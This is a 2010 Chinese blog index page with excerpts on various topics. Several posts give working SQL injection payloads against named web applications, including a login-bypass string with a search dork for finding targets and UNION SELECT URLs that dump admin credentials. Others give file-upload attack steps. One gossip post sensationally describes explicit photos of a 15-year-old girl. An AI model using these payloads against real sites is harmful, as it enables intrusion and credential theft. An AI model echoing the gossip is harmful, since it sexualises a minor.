经常来小博的童鞋看一下

2010/04/29 21:24 | 教主 | 心情随笔 | 抢占沙发

这个域名下的文章不更新了,烦请常来的和挂友情链接的童鞋转向新地址

<a title=”教主’s Blog | 关注网络安全” href=”http://jiaozhu.org” target=”_blank”>教主’s Blog</a>

Tags: ,

“卧室门”走红网络 15岁少女自曝不雅照

2010/04/27 9:44 | 教主 | 音影娱乐 | 9 条评论

近在网络上关于艳照门事件的当数徐莹艳照门最为火辣,网友们更是将其称作是旅游四级艳照。所谓四级,就是比三级还来得更猛,故称之为四级。或许是因为压力太大的缘故,网络上更是流传出徐莹自杀的八卦新闻,与兽兽门兽兽自杀传闻如出一辙。
本以为徐莹四级艳照将会给青少年敲响警钟,谁知近日香港传出了某15岁初三女生自爆自己在卧室的一系列艳照,及尺度与三级片无异,因此网友们借鉴徐莹四级艳照而将香港15岁女生的不雅照事件称作是卧室门三级自拍。 阅读全文 »

Tags: ,

sitereptile脚本注入漏洞

2010/04/27 9:32 | 教主 | 技术文章 | 2 条评论

作者:SkuLL-HacKeR
测试环境:MacBook & Windows XP SP3
大家直接在GOOGLE中搜索:Powered by sitereptile ,在搜索到的结果中直接进站点的管理页面

http://jiaozhu.org/admin.php

然后用户名是:admin’ or ‘a’='a,密码:antidz,进去后大家就各自发挥了..哈.

Tags: , ,

Uiga Personal Portal index.php (view)脚本注入漏洞

2010/04/27 9:18 | 教主 | 技术文章 | 抢占沙发

作者:41.w4r10r
测试环境:Apcahe/Unix
注入链接

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

示例

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin--

提示:有时候表名是administrators,而有时候是admin

Tags: , ,

CMScout 2.08脚本注入漏洞

2010/04/27 9:08 | 教主 | 技术文章 | 占个座先

作者:Dr.0rYX and Cr3w-DZ
注入点

http://server/index.php?page=photos&album=[N.A.S.T ]

利用方法

http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--

示例

http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
Tags: , ,

周杰伦超人不会飞完整版下载

2010/04/26 12:31 | 教主 | 免费资源 | 5 条评论

在今天上午的音乐电台里曝光了周杰伦的首播主打歌《超人不会飞》,这首由周杰伦填词谱曲兼制作,以抒情曲风缓缓唱出出道十年心路历程与感慨的新歌,一经曝光之后便迎来了无数歌迷的热捧与褒奖。
歌词中周杰伦自嘲没有特异功能,只有梦想与坚持去做音乐!没想到他的歌曲可以变成学校教材,他的一举一动都变成社会榜样。周杰伦表示这样的生活难免觉得累,也需要呼吸空间,但歌词同时也透露「不要问我哭过了没,因为超人不能流眼泪!」依然展现十足铁汉个性。 阅读全文 »

Tags: , , ,

clipak 文件上传漏洞

2010/04/26 9:46 | 教主 | 技术文章 | 抢占沙发

作者:indoushka
邮箱:indoushka(at)hotmail.com
测试环境:windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
测试方法:

1:http://127.0.0.1/clipak/admin/upload.php (2 Upload)
2:http://127.0.0.1/clipak/files (2 find)
Tags: ,

phpegasus (fckeditor)远程任意文件上传漏洞

2010/04/26 9:40 | 教主 | 技术文章 | 占个座先

作者:eidelweiss
测试方法 阅读全文 »

Tags: , , ,

MySQL索引优化

2010/04/26 9:26 | 教主 | 技术文章 | 占个座先

建设数据库的优化大概主要就是索引的优化了吧,因为我们不可能修改数据结构的情况下,提高数据库的查询效率似乎也只能用索引了。当然这也是建立在你sql语句写的比较科学的情况下,如果你的sql语句本身就写的比较垃圾,神仙也救不了你!下面是在网上查找的一些资料,抄过来留做学习用吧.
1:创建索引
对于查询占主要的应用来说,索引显得尤为重要。很多时候性能问题很简单的就是因为我们忘了添加索引而造成的,或者说没有添加更为有效的索引导致。如果不加索引的话,那么查找任何哪怕只是一条特定的数据都会进行一次全表扫描,如果一张表的数据量很大而符合条件的结果又很少 阅读全文 »

Tags: , ,

微软官方Microsoft office 2010 RTM使用评析和简体/繁体中文版(msdn)下载

2010/04/26 9:20 | 教主 | 免费资源 | 2 条评论

作为新一代的办公软件Office2010,它的用户界面和新标识简洁明快,标识也改为了全橙色。Office 2010采用Ribbon新界面主题,由于程序功能的日益增多,微软专门为Office 2010开发了这套界面。
微软新一代Office办公软件代号为Office14,之所以在Office 12(Office 2007)后就直接使用Office 14是因为微软认为13不吉利,不过微软目前已经用office 2010 来代替 office 14。这一命名也很符合微软对产品的命名习惯,很多操作系统和Office都以年份来命名,比如Windows 95/98、Office2003/2007。 阅读全文 »

Tags: , ,
Page 1 of 121234510...Last »